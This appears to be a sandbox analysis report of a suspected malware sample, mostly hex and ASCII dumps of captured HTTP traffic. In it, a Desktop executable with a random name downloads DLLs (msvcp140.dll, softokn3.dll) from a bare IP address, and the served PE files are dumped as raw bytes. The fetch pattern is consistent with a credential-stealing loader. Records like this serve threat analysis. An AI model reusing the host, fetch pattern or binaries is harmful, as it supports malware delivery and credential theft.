                                                                                                                                                                                                                          2024-10-23 15:06:07 UTC16384INData Raw: 04 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24
                                                                                                                                                                                                                          Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$
                                                                                                                                                                                                                          2024-10-23 15:06:07 UTC16384INData Raw: 81 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33
                                                                                                                                                                                                                          Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3
                                                                                                                                                                                                                          2024-10-23 15:06:08 UTC16384INData Raw: 0b 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00
                                                                                                                                                                                                                          Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                                                          2024-10-23 15:06:08 UTC16384INData Raw: 10 b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24
                                                                                                                                                                                                                          Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          14192.168.2.44983395.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:11 UTC199OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:11 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:11 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 450024
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Last-Modified: Wednesday, 23-Oct-2024 15:06:11 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          2024-10-23 15:06:11 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                          2024-10-23 15:06:11 UTC16384INData Raw: 00 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00
                                                                                                                                                                                                                          Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mn
                                                                                                                                                                                                                          2024-10-23 15:06:11 UTC16384INData Raw: 00 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00
                                                                                                                                                                                                                          Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                                                                          2024-10-23 15:06:11 UTC16384INData Raw: 18 d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9
                                                                                                                                                                                                                          Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]
                                                                                                                                                                                                                          2024-10-23 15:06:11 UTC16384INData Raw: 6a 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74
                                                                                                                                                                                                                          Data Ascii: jatAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                                                          2024-10-23 15:06:12 UTC16384INData Raw: 85 c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00
                                                                                                                                                                                                                          Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                                                                                          2024-10-23 15:06:12 UTC16384INData Raw: f0 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e
                                                                                                                                                                                                                          Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                                                                          2024-10-23 15:06:12 UTC16384INData Raw: e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7
                                                                                                                                                                                                                          Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                                                                          2024-10-23 15:06:12 UTC16384INData Raw: cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06
                                                                                                                                                                                                                          Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv
                                                                                                                                                                                                                          2024-10-23 15:06:12 UTC16384INData Raw: f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57
                                                                                                                                                                                                                          Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          15192.168.2.44985795.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:14 UTC199OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:15 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:15 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 257872
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Last-Modified: Wednesday, 23-Oct-2024 15:06:15 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          2024-10-23 15:06:15 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                          2024-10-23 15:06:15 UTC16384INData Raw: 7d 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00
                                                                                                                                                                                                                          Data Ascii: }jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                                                                                                                          2024-10-23 15:06:15 UTC16384INData Raw: 8b 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50
                                                                                                                                                                                                                          Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                                                                                                                          2024-10-23 15:06:15 UTC16384INData Raw: f9 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f
                                                                                                                                                                                                                          Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                                                                          2024-10-23 15:06:15 UTC16384INData Raw: 85 c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84
                                                                                                                                                                                                                          Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!
